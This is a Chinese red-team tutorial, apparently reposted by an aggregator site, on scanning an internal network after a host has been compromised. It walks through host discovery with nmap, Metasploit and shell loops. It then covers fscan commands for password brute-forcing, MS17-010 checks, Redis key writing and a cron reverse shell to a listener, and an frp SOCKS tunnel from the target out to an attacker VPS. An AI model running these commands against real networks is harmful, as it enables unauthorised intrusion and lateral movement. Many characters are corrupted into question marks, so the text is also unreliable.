前言

當(dāng)我們能訪問到?標(biāo)內(nèi)?任何資源之后，我們就可以對(duì) ?標(biāo)內(nèi)?進(jìn)?更深層次的信息搜集?如：主機(jī)收集、IP 段搜集、端?開放服務(wù)、Web 資產(chǎn)數(shù)量、漏洞類型。接下來是一些工具的食用姿勢(shì)，僅供參考。

假設(shè)我們已經(jīng)獲取到 web-2012 的權(quán)限，接下來如何對(duì)內(nèi)?進(jìn)?信息搜集，內(nèi)?掃描。

信息收集

主機(jī)存活探測(cè)

基于netbios的內(nèi)網(wǎng)存活主機(jī)發(fā)現(xiàn)

netbios簡(jiǎn)介

IBM公司開發(fā)，主要用于數(shù)十臺(tái)計(jì)算機(jī)的小型局域網(wǎng)。該協(xié)議是一種在局域網(wǎng)上的程序可以
使用的應(yīng)用程序編程接口（API），為程序提供了請(qǐng)求低級(jí)服務(wù)的同一的命令集，作用是為
了給局域網(wǎng)提供網(wǎng)絡(luò)以及其他特殊功能。
系統(tǒng)可以利用WINS服務(wù)、廣播及Lmhost文件等多種模式將NetBIOS名-——特指基于
NETBIOS協(xié)議獲得計(jì)算機(jī)名稱——解析為相應(yīng)IP地址，實(shí)現(xiàn)信息通訊，所以在局域網(wǎng)內(nèi)部使
用NetBIOS協(xié)議可以方便地實(shí)現(xiàn)消息通信及資源的共享。

nmap

sudo nmap -sU --script nbstat.nse -p137 192.168.10.1/24 -T4

注：nmap連自己都會(huì)掃，及時(shí)沒有netbios也會(huì)提示主機(jī)存活。比如kali linux本身。

MSF——auxiliary/scanner/netbios/nbname

效果沒那么好。

nbtscan

Nbtscan 是?款能迅速查找電腦IP地址以及MAC地址的軟件，不過只能?于局域?，顯示IP、主機(jī)名、?戶名稱以 及MAC地址。

nbtscan -v -s : 192.168.43.0/24????????? ????????? # windows和linux通用

通過 nbtscan 在內(nèi)?滲透中所使?的場(chǎng)景?的就是為了幫助我們快速識(shí)別那些機(jī)器是域機(jī)器，那些機(jī)器是 DC，那 些機(jī)器是?作組機(jī)器。

kali下的nbtscan：

windows下的nbtscan.exe：（會(huì)剔除本機(jī)所在的機(jī)器）

基于SMB協(xié)議的內(nèi)網(wǎng)存活主機(jī)發(fā)現(xiàn)

簡(jiǎn)介

SMB(全稱是Server Message Block)是一個(gè)協(xié)議名，它能被用于Web連接和客戶端與服務(wù)器之間的信息溝通。SMB最初是IBM的貝瑞·費(fèi)根鮑姆（Barry Feigenbaum）研制的，其目的是將DOS操作系統(tǒng)中的本地文件接口“中斷13”改造為網(wǎng)絡(luò)文件系統(tǒng)。

nmap

nmap -sS --script smb-enum-shares.nse -p 445 192.168.43.1/24

MSF——auxiliary/scanner/smb/smb_version

msf6 auxiliary(scanner/netbios/nbname) > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.43.1/24
rhosts => 192.168.43.1/24
msf6 auxiliary(scanner/smb/smb_version) > set threads 10
threads => 10
msf6 auxiliary(scanner/smb/smb_version) > exploit

基于CMD

需要開啟telnet窗口

for /l %a in (1,1,254) do start /min /low telnet 192.168.1.%a 445

基于powershell

# 單IP，OK
445 | %{ echo ((new-object Net.Sockets.TcpClient).Connect("192.168.43.83",$_)) "$_ is open"} 2>$null

# 多IP
80..85 | % { $a = $_; 445 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.43.$a",$_)) "Port $_ is open"} 2>$null}
Port 445 is open

#多IP，多port
80..85 | % { $a = $_; write-host "- - - - -"; write-host "192.168.43.$a"; 137,445 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.43.$a",$_)) "Port $_ is open"} 2>$null}

- - - - -
192.168.43.80
- - - - -
192.168.43.81
- - - - -
192.168.43.82
- - - - -
192.168.43.83
Port 445 is open
- - - - -
192.168.43.84
- - - - -
192.168.43.85

基于ARP協(xié)議的內(nèi)網(wǎng)存活主機(jī)發(fā)現(xiàn)

概念

ARP,通過解析網(wǎng)路層地址來找尋數(shù)據(jù)鏈路層地址的一個(gè)在網(wǎng)絡(luò)協(xié)議包中極其重要的網(wǎng)絡(luò)傳輸 協(xié)議。根據(jù)IP地址獲取物理地址的一個(gè)TCP/IP協(xié)議。主機(jī)發(fā)送信息時(shí)將包含目標(biāo)IP地址的 ARP請(qǐng)求廣播到網(wǎng)絡(luò)上的所有主機(jī)，并接收返回消息，以此確定目標(biāo)的物理地址。

nmap

nmap -sn -PR 192.168.10.1/24
-sn????????? ????????? # 不掃描端口，只掃描主機(jī)
-PR????????? ????????? # ARP ping掃描

MSF——auxiliary/scanner/discovery/arp_sweep

基于SNMP協(xié)議的內(nèi)網(wǎng)存活主機(jī)發(fā)現(xiàn)

簡(jiǎn)介

SNMP是一種簡(jiǎn)單網(wǎng)絡(luò)管理協(xié)議，它屬于TCP/IP五層協(xié)議中的應(yīng)用層協(xié)議，用于網(wǎng)絡(luò)管理的
協(xié)議。SNMP主要用于網(wǎng)絡(luò)設(shè)備的管理。SNMP協(xié)議主要由兩大部分構(gòu)成：SNMP管理站和
SNMP代理。SNMP管理站是一個(gè)中心節(jié)點(diǎn)，負(fù)責(zé)收集維護(hù)各個(gè)SNMP元素的信息，并對(duì)這
些信息進(jìn)行處理，最后反饋給網(wǎng)絡(luò)管理員；而SNMP代理是運(yùn)行在各個(gè)被管理的網(wǎng)絡(luò)節(jié)點(diǎn)之
上，負(fù)責(zé)統(tǒng)計(jì)該節(jié)點(diǎn)的各項(xiàng)信息，并且負(fù)責(zé)與SNMP管理站交互，接收并執(zhí)行管理站的命
令，上傳各種本地的網(wǎng)絡(luò)信息。

nmap

nmap -sU -T4 --script snmp-brute 192.168.10.0/24

MSF——auxiliary/scanner/snmp/snmp_enum

msf6 auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.43.1/24
rhosts => 192.168.43.1/24
msf6 auxiliary(scanner/snmp/snmp_enum) > set threads 10
threads => 10
msf6 auxiliary(scanner/snmp/snmp_enum) > exploit

基于ICMP協(xié)議的內(nèi)網(wǎng)存活主機(jī)發(fā)現(xiàn)

簡(jiǎn)介

?ICMP是TCP/IP協(xié)議族的一個(gè)子協(xié)議，用于在IP主機(jī)、路由器之間傳遞控制消息。控制消息是指 網(wǎng)絡(luò)通不通、主機(jī)是否可達(dá)、路由是否可用等網(wǎng)絡(luò)本身的消息。這些控制消息雖然并不傳輸 用戶數(shù)據(jù)，但是對(duì)于用戶數(shù)據(jù)的傳遞起著重要的作用。

nmap

nmap -PE -sn -T4 192.168.43.1/24

cmd

# 打印在屏幕當(dāng)中
for /L %P in (1,1,254) DO @ping -w 1 -n 1 192.168.43.%P | findstr "TTL="
來自 192.168.43.18 的回復(fù): 字節(jié)=32 時(shí)間<1ms TTL=64
來自 192.168.43.83 的回復(fù): 字節(jié)=32 時(shí)間=1ms TTL=128
來自 192.168.43.106 的回復(fù): 字節(jié)=32 時(shí)間<1ms TTL=128

# 輸入到文件當(dāng)中（windows）
for /l %p in (1,1,254) do @ping -l 1 -n 3 -w 40 192.168.1.%p & if errorlevel 1 (echo 192.168.1.%p>>na.txt) else (echo 192.168.1.%p>>ok.txt)

# 輸入到文件當(dāng)中（linux），未成功
for i in {1..254}; do ping -q -i 0.01 -c 3 192.168.1.$i &> /dev/null && echo 192.168.1.$i is alive; done

資產(chǎn)存活探測(cè)

PTscan

PTscan(Phantom scanner) 是一款界面友好的輕量級(jí)web應(yīng)用資產(chǎn)掃描器，適合于內(nèi)網(wǎng)滲透測(cè)試環(huán)境下web的資產(chǎn)快捷識(shí)別，只需Python環(huán)境，無需第三方擴(kuò)展庫，掃描結(jié)果使用zoomeye網(wǎng)頁樣式。

下載地址：https://github.com/phantom0301/PTscan

使用python2的pyinstaller庫打包成exe

pyinstaller -F -w ptscan.py

具體使用語法：

Usage: python PTscan.py {-f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306] [-m 50] [-t 10] [-n] [-b] [-r]
-f????????? 指定掃描?標(biāo)?件，?件格式如list.txt所示，同時(shí)?持IP和URL
-h? 指定掃描IP或IP段，?持段掃描，如192.168.1 即為掃描C段，192.168 即為掃描B段
-p? 指定掃描端?，缺省使?程序中的配置端?
-m? 指定線程數(shù)
-t? 指定timeout
-n????????? 不進(jìn)行ping操作，直接掃描
-b????????? 開啟Banner識(shí)別
-r? reverseIP

掃描示例：

python2 PTscan.py -h 10.10.10 -p 80,8080,8888 -m 50 -t 10 -n -b

當(dāng)ptscan掃描完成后會(huì)在當(dāng)前路徑下生成一個(gè)html文件。使用瀏覽器打開，即可看到掃描出來的web資產(chǎn)：banner、中間件、url、開放端口。

漏洞掃描

?Inscan

邊界打點(diǎn)后的?動(dòng)化內(nèi)??具，完全與服務(wù)端脫離。服務(wù)端只?于?成poc，?段信息等配置。

?多平臺(tái)，單一的二進(jìn)制文件，免依賴;

?支持自動(dòng)可視化多級(jí)隧道，通過后臺(tái)按鈕開關(guān)即可穿越多層網(wǎng)絡(luò);

?支持ipv6的掃描器;

?快速直觀查看多網(wǎng)卡機(jī)器，方便快速定位能穿多層網(wǎng)絡(luò)機(jī)器;

?通過已知密碼生成社工字典，快速橫向內(nèi)網(wǎng);

?內(nèi)網(wǎng)B/S架構(gòu)系統(tǒng)自動(dòng)化爆破，驗(yàn)證碼自動(dòng)識(shí)別;

?快速資產(chǎn)識(shí)別，站點(diǎn)截圖;

?通過掃描到的資產(chǎn)自動(dòng)化進(jìn)行網(wǎng)站目錄掃描；

官?地址：https://www.inbug.org/

然后注冊(cè)一個(gè)用戶生成一個(gè)Inscan Agent：

下載后在目標(biāo)終端運(yùn)行即可（盡量使用管理員權(quán)限，否則有的時(shí)候會(huì)卡住）

掃描完成后會(huì)在當(dāng)前路徑下?產(chǎn)?個(gè) poc.db ?件：

把 poc.db 拖回本地也?，或者再次運(yùn)? again ，訪問?標(biāo) ip:54088 即可看到掃描結(jié)果：

fscan

一款內(nèi)網(wǎng)綜合掃描工具，方便一鍵自動(dòng)化、全方位漏掃掃描。支持主機(jī)存活探測(cè)、端口掃描、常見服務(wù)的爆破、ms17010、redis批量寫公鑰、計(jì)劃任務(wù)反彈shell、讀取win網(wǎng)卡信息、web指紋識(shí)別、web漏洞掃描、netbios探測(cè)、域控識(shí)別等功能，在不指定特定模塊的前提下，默認(rèn)啟用所有模塊。

下載地址：https://github.com/shadow1ng/fscan

常用命令：

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳過存活檢測(cè) 、不保存文件、跳過web poc掃描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫公鑰)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計(jì)劃任務(wù)反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令執(zhí)行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模塊ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加載指定文件的用戶名、密碼來進(jìn)行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定掃描結(jié)果保存路徑,默認(rèn)保存在當(dāng)前路徑)
fscan.exe -h 192.168.1.1/8? (A段的192.x.x.1和192.x.x.254,方便快速查看網(wǎng)段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密碼碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模塊)
fscan.exe -hf ip.txt? (以文件導(dǎo)入)
fscan.exe -u http://baidu.com -proxy 8080 (掃描單個(gè)url,并設(shè)置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不進(jìn)行爆破,不掃Web poc,以減少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基礎(chǔ)上,加入3389->rdp掃描)

?特殊手法：
針對(duì)B段滲透時(shí)，建議使用單模塊測(cè)試，使用全模塊時(shí)速度會(huì)比較慢，應(yīng)該是1.6.3版本的bug，新版本未做測(cè)試，不清楚具體情況。除此之外，1.6.3模塊在探測(cè)ftp的時(shí)候錯(cuò)誤會(huì)一直卡頓，而不是跳過。

?掃描手法：fscan.exe -h 175.34.1.1/16 -m

?推薦模塊（基于1.7.0）：

# 數(shù)據(jù)庫爆破
mgo????????? # mongodb數(shù)據(jù)庫
redis????????? # redis數(shù)據(jù)庫
psql????????? # postgresql數(shù)據(jù)庫
mssql????????? # SQL Server數(shù)據(jù)庫
mysql????????? # mysql數(shù)據(jù)庫
mem ???????? ????????? # mem代表Memcached，是一個(gè)內(nèi)存對(duì)象緩存服務(wù)，跟Redis很相像。
注：oracle雖然在更新記錄中指出支持，但是在打包后，還是無法指定該模塊，查看時(shí)也無法看到。

# 服務(wù)爆破
smb # 采用SMB協(xié)議的文件共享服務(wù)
rdp????????? # windows的遠(yuǎn)程桌面服務(wù)
ftp????????? ????????? # 文件傳輸服務(wù)
ssh????????? ????????? # linux下的遠(yuǎn)程登錄協(xié)議

# 漏洞掃描
ms17010????????? 通過TCP端口445和139來利用SMBv1和NBT中的遠(yuǎn)程代碼執(zhí)行漏洞，利用SMB協(xié)議，也稱作永恒之藍(lán)
cve20200796????????? SMB 3.1.1協(xié)議遠(yuǎn)程代碼執(zhí)行漏洞，也稱作永恒之黑
fcgi????????? 快速通用網(wǎng)關(guān)接口，fastcgi，遠(yuǎn)程代碼執(zhí)行等漏洞
web????????? ????????? 收集資產(chǎn)并且進(jìn)行漏洞掃描

# 查看所有可用模塊
fscan.exe -m -h

使用案例：

C:\Windows\Temp>fscan.exe -h 10.10.10.0/24 -o 10.txt
?? ___????????????????????????????? _
? / _ \???? ___? ___ _ __ __ _? ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|?? <
\____/???? |___/\___|_|? \__,_|\___|_|\_\
???????????????????? fscan version: 1.7.0
scan start
(icmp) Target '10.10.10.3' is alive
(icmp) Target '10.10.10.12' is alive
(icmp) Target '10.10.10.10' is alive
(icmp) Target '10.10.10.11' is alive
(icmp) Target '10.10.10.20' is alive
icmp alive hosts len is: 5
10.10.10.10:445 open
10.10.10.10:135 open
10.10.10.3:445 open
10.10.10.3:135 open
10.10.10.12:445 open
10.10.10.12:135 open
10.10.10.12:80 open
10.10.10.20:445 open
10.10.10.20:135 open
10.10.10.11:445 open
10.10.10.11:135 open
10.10.10.20:88 open
10.10.10.10:88 open
10.10.10.11:88 open
NetInfo:
[*]10.10.10.12
[->]web-2012
[->]192.168.1.109
[->]10.10.10.12
NetInfo:
[*]10.10.10.10
[->]AD-2016
[->]10.10.10.10
NetInfo:
[*]10.10.10.3
[->]web-2003
[->]10.10.10.3
WebTitle:http://10.10.10.12 200 IIS Windows Server
[+] 10.10.10.20 MS17-010 (Windows Server 2016 Standard 14393)
NetInfo:
[*]10.10.10.11
[->]AD2-2016
[->]10.10.10.11
[+] 10.10.10.3 MS17-010 (Windows Server 2003 3790 Service Pack 2)
[+] 10.10.10.11 MS17-010 (Windows Server 2016 Standard 14393)
[+] 10.10.10.10 MS17-010 (Windows Server 2016 Standard 14393)
scan end
C:\Windows\Temp>

goby

Goby號(hào)稱新一代的網(wǎng)絡(luò)安全測(cè)試工具，有IP存活探測(cè)、端口掃描、資產(chǎn)探測(cè)、主機(jī)識(shí)別等功能，內(nèi)置代理功能。代理方式有socket和pcap兩種，socket支持socks和HTTP兩種，均支持身份驗(yàn)證。

紅隊(duì)人員VPS（192.168.10.110）配置frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7000

然后啟動(dòng)frp服務(wù)端：

./frps -c frps.ini

在目標(biāo)網(wǎng)絡(luò)邊界weblogic配置frpc.ini

[common]
server_addr = 192.168.10.110（紅隊(duì)人員VPS）
server_port = 7000

[plugin_socks]
type = tcp
remote_port =7777
plugin = socks5

然后啟動(dòng)客戶端

./frpc.exe -c frpc.ini

在goby中設(shè)置socks代理：

然后新建任務(wù)，配置參數(shù)進(jìn)行漏洞掃描：

goby在滲透測(cè)試當(dāng)中探測(cè)C段還OK，如果是B段的話，設(shè)置特殊端口，然后再掃描。大批量掃的話，就要看Inscan和fscan了。

結(jié)尾

在內(nèi)?滲透中，?些內(nèi)?掃描?具能夠幫助我們紅隊(duì)?員減去很多時(shí)間，不??動(dòng)去信息搜集、不??動(dòng)去漏洞探測(cè)，因此掌握?個(gè)漏洞掃描器或者多個(gè)掃描器的使??法是我們紅隊(duì)?員最基本的要求。

除了以上的metasploit、Nmap...等等一些優(yōu)秀的工具等著大家去發(fā)掘和使用。

總結(jié)

以上是生活随笔為你收集整理的内网渗透-内网信息搜集的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。